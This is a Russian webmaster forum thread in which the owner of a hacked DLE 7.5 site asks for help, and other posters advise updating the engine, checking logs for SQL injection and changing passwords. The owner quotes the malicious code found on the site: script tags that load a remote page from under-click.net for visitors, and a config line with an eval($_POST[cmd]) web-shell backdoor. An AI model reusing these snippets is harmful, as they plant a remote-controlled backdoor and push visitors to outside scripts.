Нужна помощь - ифреймы заколебали

[Удален]
665

Начну сначала ))

DLE 7.5

Ифреймы периодически, вставляются в несколько мест:

1) engine/engine.php - между метатегами

<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=****"></script>

вот такого плана

2) public_html/engine/data/referer.conf.php

if ((!isset($_COOKIE['dle_password'])) and ($_SERVER['REMOTE_ADDR']!="**.***.**.**") ) {

echo <<<HTML

<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=****"></script>

HTML;

}

вот такая дописка )). Причем иногда созданная апачем, и просто так не удалить, пока не сменить права в директадмине.

3) тупо в каждую краткую новость

В связи с этим вопрос - как обезопасить себя в дальнейшем - заплатки вроде все стоят. Комп регулярно сканирую Каспером + Spyware Doctor-ом.

За разумную цену заплачу за стоящие заплатки в личном порядке. Хелп в общем.

AM
На сайте с 09.01.2007
Offline
467
#1

Версию давно пора обновить, сейчас актуальная 9.0

[Удален]
#2

спасибо КЭП )) Мне нужны советы, как защитить эту версию, да и непонятно в ней ли дело, или мне шелл залили на сервак

AM
На сайте с 09.01.2007
Offline
467
#3

Там с момента выхода вашей версии столько дыр нашли что проще воду решетом носить.

[Удален]
#4

я же написал - ВСЕ заплатки от dle-news проставлены + еще парочку своих

stopbaza добавил 16.11.2010 в 17:50

Хелп ))

Нашел в одном из конфигов такую конструкцию:

'sea_sort' => "{${@eval($_POST[cmd])}}",

ввиду php безграмотности только накопал, что так подключается шелл. А как его вычислить на серваке?

A3
На сайте с 20.10.2010
Offline
5
#5
stopbaza:
'sea_sort' => "{${@eval($_POST[cmd])}}",

ввиду php безграмотности только накопал, что так подключается шелл. А как его вычислить на серваке?

Ищите по логам SQL-injection откуда прилетела, и ставьте заплатки на те модули, заодно и пароли на БД потом смените. Все остальное безобразие на сайте - следствие работы с админкой и шеллом.

vip-59
На сайте с 11.08.2009
Offline
63
#6

дк удаляйте эти скрипты и все. права на запись 444

Сайты - не глисты, за месяц не выведешь!

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий